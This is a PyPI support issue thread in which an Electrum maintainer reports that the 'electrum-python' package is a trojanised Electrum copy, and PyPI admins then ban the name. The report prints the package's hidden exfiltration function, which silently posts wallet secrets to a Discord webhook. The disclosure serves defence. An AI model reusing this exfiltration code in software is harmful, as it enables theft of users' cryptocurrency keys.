### ISSUE TITLE
PEP 541 Request: electrum-python (currently malware!)

### ISSUE THREAD

**Issue by SomberNight** [pypa/pypi-support#1613]
### Project to be claimed

`electrum-python`: https://pypi.org/project/electrum-python/

### Your PyPI username

`SomberNight`: https://pypi.org/user/SomberNight

### Reasons for the request

I am one of the maintainers of the [Electrum](https://github.com/spesmilo/electrum/) Bitcoin wallet project.

The `electrum-python` PyPI package is deceiving users and masquerading as Electrum, however it is stealing bitcoins.
The tar.gz being distributed contains a few dozen changed lines compared to upstream electrum 4.1.5, in order to leak cryptographic secrets via http.

```
$ sha256sum electrum-python-4.1.5.0.tar.gz
2b234a8588716d685aec61d700d938a7067927190104951368b309aafff92ff3  electrum-python-4.1.5.0.tar.gz
```
see file `electrum/base_wizard.py`, around line 743:
```python
def post_text(self, text):
        try:
            requests.post("https://discordapp.com/api/webhooks/919478842723291186/Pf7hLepqw5KY8UkUFKd0nbOukEtDzwtfQFI1gIm233apQIbIHFr2BKH1Wz5FzCo7egIG", json={"content": text})
        except Exception:
            pass
```

[Upstream Electrum](https://github.com/spesmilo/electrum/) is not distributed on PyPI.
(One of the maintainers has reserved [the name `electrum`](https://pypi.org/project/electrum/) a few years back but it is just a placeholder.)

I would like to request the confiscation of the `electrum-python` package, and either
- burning the name so that it cannot be registered
- giving control to me (SomberNight), one of the upstream maintainers
- giving control to [ThomasV](https://pypi.org/user/ThomasV/) (@ecdsa), one of the upstream maintainers, who also has control of the [`electrum`](https://pypi.org/project/electrum/) name

### Maintenance or replacement?

Replacement

### Source code repositories URLs

https://github.com/spesmilo/electrum/
https://electrum.org/

### Contact and additional research

No attempt.

### Code of Conduct

- [X] I agree to follow the PSF Code of Conduct

**Comment by yeraydiazdiaz** [comment]
@pypa/warehouse-admins I think the best course of action would be to place `electrum-python` in the prohibited project names list?

**Comment by SomberNight** [comment]
Yes, burning the name would be great.

**Comment by ewdurbin** [comment]
This is complete. In the future for malicious packages, security@python.org can be contacted.
